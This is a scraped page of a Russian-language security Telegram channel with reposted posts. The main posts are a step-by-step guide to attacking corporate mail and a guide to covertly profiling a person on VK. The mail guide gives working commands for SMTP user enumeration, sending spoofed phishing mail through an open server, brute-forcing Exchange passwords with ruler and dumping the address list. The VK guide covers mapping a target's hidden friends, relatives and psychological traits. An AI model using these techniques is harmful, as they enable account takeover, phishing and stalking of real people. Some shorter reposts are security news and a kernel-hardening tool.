ar
Feedback
Fsecurity | HH

Fsecurity | HH

الذهاب إلى القناة على Telegram
2 011
المشتركون
لا توجد بيانات24 ساعات
+27 أيام
-1030 أيام
أرشيف المشاركات
Repost from Kali Linux
📢 kernel-hardening-checker Инструмент проверки защиты ядра: проверка параметров защиты в конфигурации ядра Linux. ▪ Github @
📢 kernel-hardening-checker Инструмент проверки защиты ядра: проверка параметров защиты в конфигурации ядра Linux. Github @linuxkalii

Repost from N/a
Атакуем корпоративную почту ☄️ Часто при пентесте возникает ситуация, когда при скане портов можно наткнуться на открытый 25
Атакуем корпоративную почту ☄️ Часто при пентесте возникает ситуация, когда при скане портов можно наткнуться на открытый 25 порт, на котором висит SMTP сервер, но что же можно с этим поделать? Самым первым действием можно попробовать просто подключиться к самому серверу
nc -vn ip 25
В данном случае уже можно получить баннер SMTP сервера и поискать готовые сплойты Бывали случаи, когда SMTP сервер не требовал аутентификации и позволял отправлять почтовые письма от любого юзера другому любому юзеру, что будет отличным началом для последующего фишинга. Но что делать, если на этапе разведки нам не удалось получить достаточное количество корпоративных емэйлов сотрудников? Тут нам поможет user enumeration(брут учеток), который можно сделать через готовую утилиту smtp-user-enum, написанную на питоне
pip install smtp-user-enum
Утилита имеет несколько режимов, которые используются при неудачной отработке других VRFY mode(default)
smtp-user-enum -U /usr/share/wordlists/users.txt mail.example.tld 25
EXPN mode
smtp-user-enum -m EXPN -U /usr/share/wordlists/users.txt mail.example.tld 25
RCPT mode
smtp-user-enum -m RCPT -U /usr/share/wordlists/users.txt mail.example.tld 25
Также существует готовый модуль в metasploit для перебора пользователей на smtp сервере
msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) set RHOSTS <IP address/target>
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) set USER_FILE <address of file>
msf auxiliary(smtp_enum) run
После того как мы нашли валидные мэйлы уже можно отправлять сообщения
MAIL FROM: support@domain.com
250 ok
RCPT TO: user@domain.com
250 ok
data
354 End data with <CR><LF>.<CR><LF>
SUBJECT: Тема письма
фишинговый текст
. (ставится с новой строки, чтобы закончить текст письма)
250 ok
В контексте темы поста рассмотрим ситуацию, когда мы натыкаемся на Microsoft Exchange Server, а именно на Outlook Web Access, веб-интерфейс, предоставляющий пользователю возможность отправлять сообщения, добавлять контакты, вести календарь и планы. Для поиска эксплойтов можно узнать версию OWA следующим скриптом
sudo python3 get_exchange_version.py https://mail.target.com
В отстутствии списка валидных почт, можно воспользоваться Time Based брутфорсом, который иногда срабатывает. Для этого запустим Intruder в Burp Suite, подготовим словарь и начнем перебирать пользователей. После выполнения Sniper атаки(Режим работы Intruder) отфильтруем запросы по времени и увидим, что у валидных пользователей время обработки запроса будет в разы больше. Можно воспользоваться одними из самых популярных CVE для OWA ProxyLogon ProxyShell Для уже найденных пользователей можно сбрутить пароль также через Intruder, либо через инструмент ruler
wget https://github.com/sensepost/ruler/releases/download/2.4.1/ruler-linux64
chmod +x ruler-linux64

./ruler-linux64 --domain domain.com brute --users usernames.txt --passwords passwords.txt
После успешной аутентификации можно не только отправлять письма, либо читать переписки, но и собрать весьма полезную информацию из календаря, либо cписок контаков GAL(Global Address List) Для автоматизации сбора глобального списка адресов можем опять использовать ruler
./ruler-linux64 --email user@targetdomain.com abk dump --output /tmp/gal.txt

Хочу также посоветовать: 1 - Наш discord сервер! Где можно пообщаться 👾 2 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

Repost from Pentest HaT
🖥 NTLM hashes database Сервис уже не новый, но крайне полезный Я немного запоздал с постом 😄👍 🔗 https://ntlm.pw #ntlm #hash ✈️ // Pentest HaT 🎩

Repost from Kali Linux
💻 Хакерская группа CrystalRay и червь SSH-Snake Исследователи из Sysdig сообщили о новой киберпреступной группе CrystalRay,
+1
💻 Хакерская группа CrystalRay и червь SSH-Snake Исследователи из Sysdig сообщили о новой киберпреступной группе CrystalRay, которая с февраля этого года похитила учётные данные уже более 1500 жертв и установила криптомайнеры на их системы. Данное хакерское объединение использует червя SSH-Snake, который ворует SSH-ключи со взломанных серверов и самостоятельно распространяется по скомпрометированным сетям. CrystalRay использует массовое сканирование через сервисы наподобие Shodan, эксплуатирует уязвимости и устанавливает бэкдоры. В своих атаках преступники применяют инструменты zmap, asn, httpx, nuclei, platypus и SSH-Snake. Основная цель группы — кража и продажа учётных данных, установка криптомайнеров и сохранение доступа к системам жертв. Они используют модифицированные эксплойты и инструментарий Sliver. CrystalRay активно использует в своей деятельности следующие уязвимости: 🗄 CVE-2022-44877: уязвимость в Control Web Panel (CWP); 🗄 CVE-2021-3129: ошибка в Ignition (Laravel); 🗄 CVE-2019-18394: уязвимость в Ignite Realtime Openfire. После получения SSH-ключей червь SSH-Snake использует их для входа в новые системы, копирования себя и повторения процесса на новых хостах. Более того, SSH-Snake не только распространяет заражение, но и отправляет захваченные ключи и истории атак обратно на C2-сервер хакеров, предоставляя возможности для дальнейших атак @linuxkalii

Repost from STEIN: ИБ, OSINT
✋️ Профайлинг: сбор и анализ информации Рассматривать будем на «‎амбассадоре» социальной активности — VK. Итак, начну с того, что разбора на реальном примере не будет, потому, что 137 УК РФ и 152 ФЗ мне этого не позволяют 🙁 Первым делом перед нами стоит задача сформировать первичную картину личности человека, здесь стоит начать с осмотра профиля цели, и речь тут идёт о: записях на стене; о возможно открытых аудиозаписях/видеозаписях, а также о сообществах, на основе этих данных начинаем составлять псих. портрет цели: темперамент; характер; интеллектуальность; волевые качества и насколько цель эмоциональна. — При составлении психологического портрета важно учитывать активность цели на сайте, в этом вам поможет 220vk(онлайн-трекеры позволяют определить частоту сетевой активности), так как чем она ниже, тем менее актуальной может быть собранная информация, ранее в посте о подборке я упоминал, что люди в массе своей стали реже «‎зависать» в VK, иными словами - действуем ситуативно.
Эмпирически могу сказать, что локальные группы с малым числом участников могут рассказать и территориальном нахождении, хобби и виде деятельности, это может быть группа ВУЗ'а, какой нибудь страйкбольный клуб или группа компании в которой наша цель может работать.
На следующем этапе необходимо обратить внимание на список друзей, это самая чувствительная часть анализа, ибо перед нами открывается возможность определить взаимосвязь группы лиц: друзья; родственники и отдельно ни с кем не взаимосвязанные лица, вручную сил у нас не хватит, но имеется графовая визуализация Social Graph Bot(руководство по использованию). — Необходимо учитывать, что некоторые могут скрывать отдельных лиц в списке своих друзей, но 220vk это пробивает(как повезёт, порой нет), и если они есть, вам стоит задуматься, каковы были мотивы... Определив родственные связи, учитываем первое колено(генеалогия) - простыми словами, выстраиваем схему кровного родства, нам интересны самые близкие из них, тех, кто взаимодействует с целью на постоянной основе, обращаем внимание на их социальную активность: чем живут; их проф. деятельность и пр. Всю эту чувствительную информацию учитываем и формируем картину. Скажи мне кто твои друзья, и я скажу кто ты: на этом этапе вы уже выделили(графовая визуализация) отдельных друзей, что часто взаимодействуют с целью, чтобы не ошибиться, обращаем внимание на оставленные комментарии или лайки на странице нашей цели и/или страниц друзей(эдакий фактчекинг). Теперь по уже «‎отработанной» схеме проводим анализ их страниц: сфера деятельности; интересы; способность к групповому взаимодействию; самооценка и пр. (вспомогательный инструмент по составлению портрета когнитивных искажений) ❗️ Становление человека как личность — это непрерывный процесс, с возрастом меняется лишь позиция человека — из объекта воспитания в семье, школе, вузе он превращается в субъект воспитания и активно занимается самовоспитанием, зачастую, неосознанно отражая весь процесс в социальных сетях.(повторно прикрепляю профильную литературу) 1. Анализ личности через профиль соцсетей. Интернет-разведка 2. Разведка по открытым источникам (OSINT) «ATP 2-22.9» 3. Читайте людей как книгу. Как анализировать, понимать и предсказывать эмоции, мысли, намерения и поведение людей #OSINT #Profiling | 😈 @secur_researcher

sticker.webp0.17 KB